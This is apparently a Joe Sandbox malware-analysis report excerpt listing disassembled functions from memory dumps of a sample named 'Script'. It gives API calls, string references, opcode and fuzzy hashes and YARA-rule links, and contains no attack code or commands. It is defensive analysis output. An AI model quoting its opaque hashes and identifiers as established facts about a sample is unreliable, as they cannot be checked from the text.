Opcode Fuzzy Hash: 42e152e28913f7ddc6b6e324f740493a94ac9088f22afeb8a042975d77d2c6e8
Instruction Fuzzy Hash: 6D31E574901228ABCB61DFA4D988BCDBBB8BF08754F5045DAE41CA7250E7709F868F45

Function 6E0C2FB5 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6E0C2FB4,?,00000001,?,?), ref: 6E0C2FD7
TerminateProcess.KERNEL32(00000000,?,6E0C2FB4,?,00000001,?,?), ref: 6E0C2FDE
ExitProcess.KERNEL32 ref: 6E0C2FF0

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 31cfcbf740775a25bffcd78cdaa7bb3eca4edcea1da454c5748103922edb7aa9
Instruction ID: e0aa5a79e3cca163489a2dd1843e8986437bc985c9d98e3a0f8174ec91552c0d
Opcode Fuzzy Hash: 31cfcbf740775a25bffcd78cdaa7bb3eca4edcea1da454c5748103922edb7aa9
Instruction Fuzzy Hash: 13E04631010948AFCF126BD0C85CA8C3B69FB06A85B214829F8088B530CB39D982DA82

Function 6E0B1000 Relevance: 3.2, Strings: 2, Instructions: 709COMMON

Download Yara Rule

Strings

$u, xrefs: 6E0B191E
$u, xrefs: 6E0B17AD

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID: $u$$u
API String ID: 0-3695857504
Opcode ID: 3e69dbf21a881f328c49b20299db37937914aef611485624488f442dcc082ebe
Instruction ID: 652f73cb2d160793e7e221e83ae752c2a827877f0a95b2fdf696e2fc5e0ae147
Opcode Fuzzy Hash: 3e69dbf21a881f328c49b20299db37937914aef611485624488f442dcc082ebe
Instruction Fuzzy Hash: 39322636B446428FDF048EBDD9A53CE77E3BB463A1F109615C921EB394D23B894D8728

Function 6E0C0850 Relevance: 3.0, Strings: 2, Instructions: 507COMMONLIBRARYCODE

Download Yara Rule

Strings

2k"1, xrefs: 6E0C0C03
2k"1, xrefs: 6E0C0F9C

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID: 2k"1$2k"1
API String ID: 0-549873567
Opcode ID: 677522ba2cf76cb6b27dbbd8bfb46aa92ebcf375630c36f1a4c86527c8731a5b
Instruction ID: 2131d16aa12a4d8e367760f4119fdf05bc48fc3140ab35d3b66f1766ba97bedc
Opcode Fuzzy Hash: 677522ba2cf76cb6b27dbbd8bfb46aa92ebcf375630c36f1a4c86527c8731a5b
Instruction Fuzzy Hash: 7F0212B2A4C209DFDB04CEEDE5D13CD7BE2AB4A751F10921AE411FB654E2398885CB07

Function 009CB380 Relevance: 2.8, Strings: 2, Instructions: 264COMMON

Download Yara Rule

Strings

J, xrefs: 009CB504
Fl`b, xrefs: 009CB5EE

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: Fl`b$J
API String ID: 0-596997115
Opcode ID: 9de58b24cb174ce1097b72d5b5c4a946fa47dfa1565ed6ce585bb8d19aa16a2f
Instruction ID: 199a8bfd17837e250274ca073a342434c3bdecedb45f464f98f525bd88902021
Opcode Fuzzy Hash: 9de58b24cb174ce1097b72d5b5c4a946fa47dfa1565ed6ce585bb8d19aa16a2f
Instruction Fuzzy Hash: B081226150C3C28BD3098F2A846177BBFE5AFA7314F18999DE4D68B282D739C9098753

Function 009FDE60 Relevance: 2.7, Strings: 2, Instructions: 243COMMON

Download Yara Rule

Strings

7A}, xrefs: 009FDF41
0A}, xrefs: 009FDF19

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: 0A}$7A}
API String ID: 0-3162706979
Opcode ID: 612c47ff1980969a0b2af9e7f9725a76ffd723aefc8da033563ecb10ce4e51f3
Instruction ID: da5ec72a54163e0003d000ca6ce1b847b279b5ef80a7780de33465eb6ccb9d90
Opcode Fuzzy Hash: 612c47ff1980969a0b2af9e7f9725a76ffd723aefc8da033563ecb10ce4e51f3
Instruction Fuzzy Hash: 70513976A0A2144BE724DB28CC51B3BBB92ABD5710F1D893CDAC65B391E632AC01C781

Function 009FE320 Relevance: 2.7, Strings: 2, Instructions: 226COMMON

Download Yara Rule

Strings

5|iL, xrefs: 009FE540
%*+(, xrefs: 009FE4E0

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: %*+($5|iL
API String ID: 0-93752023
Opcode ID: bf9ee9644c84447f19e2afa8307ff14c10b1eda46b94a14c148fb653dbbca3b8
Instruction ID: 1378d029fefb65a7db291ac99544d1eda5cc2bd3e006fe88274fcf577a497ef6
Opcode Fuzzy Hash: bf9ee9644c84447f19e2afa8307ff14c10b1eda46b94a14c148fb653dbbca3b8
Instruction Fuzzy Hash: 36514372B553184BDB189E2CCC8277FBBA6ABC4714F19893DE985873A0EA74DC008791

Function 00A02E50 Relevance: 2.6, Strings: 2, Instructions: 124COMMON

Download Yara Rule

Strings

onml, xrefs: 00A02F1F
@, xrefs: 00A02F01

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: @$onml
API String ID: 0-1065360365
Opcode ID: 8ae999830ec717f49a82289dd289547bd6bfe90c4bafcc332308c5025d90304c
Instruction ID: a06dc4d01ae3f56619c369fc83a8bb52236a1558152b42fc0d3b786ff7e0e242
Opcode Fuzzy Hash: 8ae999830ec717f49a82289dd289547bd6bfe90c4bafcc332308c5025d90304c
Instruction Fuzzy Hash: E84123B09083058BD714CF24E88976BBBF1FF95328F14862CE899573E1E7359918CB82

Function 6E0CA841 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E0CA83C,?,?,00000008,?,?,6E0CA4D4,00000000), ref: 6E0CAA6E

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 35940a4b3b5a6a4231d36fe93adfef95fbcb602c59164644e5af91f2cdc56902
Instruction ID: 7370df7f2cb3bdf56faadbd5f903987975d728d1eb2ebfcc90b9953ea4854dee
Opcode Fuzzy Hash: 35940a4b3b5a6a4231d36fe93adfef95fbcb602c59164644e5af91f2cdc56902
Instruction Fuzzy Hash: F2B16831610609CFD705CF68C496B997BF0FF457A4F258658E8AACF2A1C335E982CB42

Function 6E0C19F8 Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E0C1A0E

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 8ba7137eb37567aced3ef4b6f10c00906a6178b595c2fe9ac59707445f9ef13d
Instruction ID: c4e84852f05798afe8029d613928c32f744d4c66384a844ce3ed836fe07a7748
Opcode Fuzzy Hash: 8ba7137eb37567aced3ef4b6f10c00906a6178b595c2fe9ac59707445f9ef13d
Instruction Fuzzy Hash: 34519CB1A05A0A8FDB04CF95C5927DEBBF1FB48740F20896AD425EB640E3B59A44CF91

Function 6E0C4872 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b29ed12fce9aa9f08b682eaacb3508a8996d53fff1349b60f555798d2238a3a
Instruction ID: d243f94157672215098855371db6f716008f8ceded665639e312880452056c75
Opcode Fuzzy Hash: 2b29ed12fce9aa9f08b682eaacb3508a8996d53fff1349b60f555798d2238a3a
Instruction Fuzzy Hash: 02418271804229AEDB60CFA9CC98BEEBBB9FB45744F1442D9E41DD3210DB309E858F11

Function 009C8240 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

,, xrefs: 009C8388

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: 15580e2362fddfaf6b891e5e6c3d002be01ea6c7b7f2a95b696f181195c89938
Instruction ID: cd79d6ffcfc81d7e8886f30870bb71ddfbe4c7f30336d03e21ed7676914fb278
Opcode Fuzzy Hash: 15580e2362fddfaf6b891e5e6c3d002be01ea6c7b7f2a95b696f181195c89938
Instruction Fuzzy Hash: ABB125705083819FD325CF58C884B1BBBE0ABA9704F484E6DE5D997742D671EA08CBA7

Function 009E2120 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

0, xrefs: 009E219A

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d163aec54173df24b95285374a16abe607d0d47f233b922b8a9f097740168f70
Instruction ID: ef1c1b701a3e0749200e8e28bdf7c286a3903ad4bc131f551bc08b42c7669d82
Opcode Fuzzy Hash: d163aec54173df24b95285374a16abe607d0d47f233b922b8a9f097740168f70
Instruction Fuzzy Hash: FC716637A0D6C18BCB164F3D4C803A9AB5B5BA7330F2D83A9D9B14B3D5C5298D0693A1

Function 009F60E0 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

d, xrefs: 009F6154

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 2d5457a68068f78a5f2142b8b1da015c19f7191c5f11cb42fc5ed4a8ffc9878c
Instruction ID: 3b36df40efc844a3236ad4f98b30e62a95ebf05eef3e5930559b3a37d49224ff
Opcode Fuzzy Hash: 2d5457a68068f78a5f2142b8b1da015c19f7191c5f11cb42fc5ed4a8ffc9878c
Instruction Fuzzy Hash: C651583AB097D487D7248E7C5C513FA7A935BD3330B2C8B69D6F1873D2C66988059350

Function 6E0C5D9C Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6E0C5D9C

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 038c4164ad9f5a4fa2d58d82830172a17cd82812525c64f4f9e846feede5d8f1
Instruction ID: 918bf5b03419fd0afbe61d8d1172ca231d1b2bfa7569b5421f88234c88f1aa59
Opcode Fuzzy Hash: 038c4164ad9f5a4fa2d58d82830172a17cd82812525c64f4f9e846feede5d8f1
Instruction Fuzzy Hash: FAA012301095008B5B008E3282892493694590758031940145404C4100DA3041D0A640

Function 6E0B8930 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a3c6a0b783ffe41674a4f987e725bab78ba05c1488a7cd6d10d6939039463a3
Instruction ID: f74bfe7596435fc2dce68ce166d3ae671f283c8bf092bf1b0a4f8b4592cb6246
Opcode Fuzzy Hash: 8a3c6a0b783ffe41674a4f987e725bab78ba05c1488a7cd6d10d6939039463a3
Instruction Fuzzy Hash: 71E13A72A405068FDF04CEBCC9E57CE7BE3BB56360F149615E825EB7A4D23A49098B24

Function 009A2E89 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c544058c042142eec911dc442bbc40fa8a5ec4ea9dc4747f6eeafae185af192
Instruction ID: 29c6a718bccfc9637380468e9e024081fc6ff9fa86839c2e2b10bae513239036
Opcode Fuzzy Hash: 9c544058c042142eec911dc442bbc40fa8a5ec4ea9dc4747f6eeafae185af192
Instruction Fuzzy Hash: AEC1A07FC7C382CED7014BB490D62E6BF61E923A2537886EAD0920B907CB17854BD6D5

Function 009E1A80 Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d59ae57b75723e8a473194b8e416ac06099e004d1962a89c02b3fa77ce27d34
Instruction ID: eb3739e4f882fde7c86eb9c48078c8a25d9ee7fd6ec4886adcc5f3a9386954dd
Opcode Fuzzy Hash: 4d59ae57b75723e8a473194b8e416ac06099e004d1962a89c02b3fa77ce27d34
Instruction Fuzzy Hash: 74913732A042A14FC726CE29C84076ABB91AB95364F29C67DE8F99B3D2D774CC45C7C1

Function 009F6310 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ceae4855dbdb8447090e5a448d543eb439c8690a93fc83ffaefa46ea59212ad
Instruction ID: 52df5776b1ea3747fb589d3e8b2e0e4633f4539c3b0e65eb0898ee2c49766692
Opcode Fuzzy Hash: 9ceae4855dbdb8447090e5a448d543eb439c8690a93fc83ffaefa46ea59212ad
Instruction Fuzzy Hash: D3712937F56AA44787188D3C4C112B9AA570BD7330B3EC776AEB5EB3E5C6698D014390

Function 009E3060 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2685aa5aa7cd8aa33164e031343d12cb5af2dd2c43503b9e9ceac282da2ec8c8
Instruction ID: f680c1e479aee098d536219933e76c8309757d4e9b13f7a659e98eb10f2aac5c
Opcode Fuzzy Hash: 2685aa5aa7cd8aa33164e031343d12cb5af2dd2c43503b9e9ceac282da2ec8c8
Instruction Fuzzy Hash: 24617C3560C3D15FC7268F29C884A2E7BE1AF96310F48C2ADE8E44B392D671DD05C792

Function 009E2480 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d77ddeb152d7e8874b0a4fea5b7f6f8d5db53cc1797da7e9bec149dbec24a2c
Instruction ID: 6e33fc826ae0a33548d767e7c3e68eb5cc07bc84d044b5df2f7d7949a21a31be
Opcode Fuzzy Hash: 1d77ddeb152d7e8874b0a4fea5b7f6f8d5db53cc1797da7e9bec149dbec24a2c
Instruction Fuzzy Hash: 1251373760D6D14BD32A8B3D4C213A96B9B4BD6334F2C8B7EE5B28B3E1D9594C058301

Function 009DA6B0 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction ID: c4a48939f8ece878de1515e4c4b820f740a9794359856bb41c64a0098f638834
Opcode Fuzzy Hash: 7a984843b570b7378253929d1441754c9cdf9516a4ccd76f455c2bd59a9e2d53
Instruction Fuzzy Hash: 3C01263BA413028B8324CF5CC0D06ABB3B4FF95790B1A845ED5411F370DB319D258221

Function 6E0C4189 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction ID: 084a32fb0cb9d86da45d1dd4c961bcee84f89d35af91df41b1a7f5b217586c7b
Opcode Fuzzy Hash: 8d52fb2acaea47cc711755e886856fc2c512988177476dc3ebe6c672e5574d84
Instruction Fuzzy Hash: 2FE08CB2911228EBCB11CBC8C904A8EF3ECFB44E54B1108A6FA06D3200C270DE01C7C1

Function 009CD990 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2391245033.00000000009A2000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000000.00000002.2391173555.00000000009A0000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9a0000_Script.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f00d29758c8e88557259673db34bf3bfce6f3f27a36d7300623395b6402989e2
Instruction ID: 5c950f05b2b2f21b3378778f8d20e2a62b79f73e811c4bc58e2fdcd9ca92839d
Opcode Fuzzy Hash: f00d29758c8e88557259673db34bf3bfce6f3f27a36d7300623395b6402989e2
Instruction Fuzzy Hash: 6ED0A728A146456F9918B739ADCBD37BE3C8347204F002134AD42E7385D800D818C2EE

Function 6E0C6B78 Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6E0C6BBC

Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AC4
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AD6
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AE8
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8AFA
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B0C
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B1E
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B30
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B42
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B54
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B66
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B78
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B8A
Part of subcall function 6E0C8AA7: _free.LIBCMT ref: 6E0C8B9C

_free.LIBCMT ref: 6E0C6BB1

Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB

_free.LIBCMT ref: 6E0C6BD3
_free.LIBCMT ref: 6E0C6BE8
_free.LIBCMT ref: 6E0C6BF3
_free.LIBCMT ref: 6E0C6C15
_free.LIBCMT ref: 6E0C6C28
_free.LIBCMT ref: 6E0C6C36
_free.LIBCMT ref: 6E0C6C41
_free.LIBCMT ref: 6E0C6C79
_free.LIBCMT ref: 6E0C6C80
_free.LIBCMT ref: 6E0C6C9D
_free.LIBCMT ref: 6E0C6CB5

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395022429.000000006E0D2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395076661.000000006E121000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0b0000_Script.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6022a2863d8e01a106007be0c5e00d9693f3d36bbdd0d6810fd7bb05232d41bb
Instruction ID: 9fd57ecce7e35183c1efc5d9bace8c15e638c33871fa20f039457eb214a275bc
Opcode Fuzzy Hash: 6022a2863d8e01a106007be0c5e00d9693f3d36bbdd0d6810fd7bb05232d41bb
Instruction Fuzzy Hash: D2319231514701AFEB608AF8E840BAE73EEFF05F54F208829E169D7154DF31E9819722

Function 6E0C3D53 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6E0C3D69

Part of subcall function 6E0C4493: HeapFree.KERNEL32(00000000,00000000,?,6E0C36CC), ref: 6E0C44A9
Part of subcall function 6E0C4493: GetLastError.KERNEL32(?,?,6E0C36CC), ref: 6E0C44BB

_free.LIBCMT ref: 6E0C3D75
_free.LIBCMT ref: 6E0C3D80
_free.LIBCMT ref: 6E0C3D8B
_free.LIBCMT ref: 6E0C3D96
_free.LIBCMT ref: 6E0C3DA1
_free.LIBCMT ref: 6E0C3DAC
_free.LIBCMT ref: 6E0C3DB7
_free.LIBCMT ref: 6E0C3DC2
_free.LIBCMT ref: 6E0C3DD0

Memory Dump Source

Source File: 00000000.00000002.2394974273.000000006E0B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E0B0000, based on PE: true

Associated: 00000000.00000002.2394959242.000000006E0B0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2395003493.000000006E0CC000.00000002.00000001.01000000.00000007.sdmpDownload File
